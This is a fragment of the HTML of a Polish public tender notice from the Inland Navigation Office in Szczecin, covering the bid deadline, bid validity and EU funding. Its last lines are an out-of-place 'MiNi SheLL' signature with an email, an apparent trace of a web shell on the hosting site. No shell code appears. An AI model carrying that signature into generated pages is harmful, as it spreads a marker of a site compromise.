<li>2 - termin realizacji - 20</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szczecin.uzs.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Żeglugi Śródlądowej w Szczecinie, pl. Stefana Batorego 4, pok. nr 29..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.08.2015 godzina 09:30, miejsce: Urząd Żeglugi Śródlądowej w Szczecinie, pl. Stefana Batorego 4, pok. nr 29..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Program Operacyjny Infrastruktura i Środowisko, działanie 7.5 Poprawa stanu śródlądowych dróg wodnych, Priorytet VII Transport przyjazny środowisku na lata 2007-2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com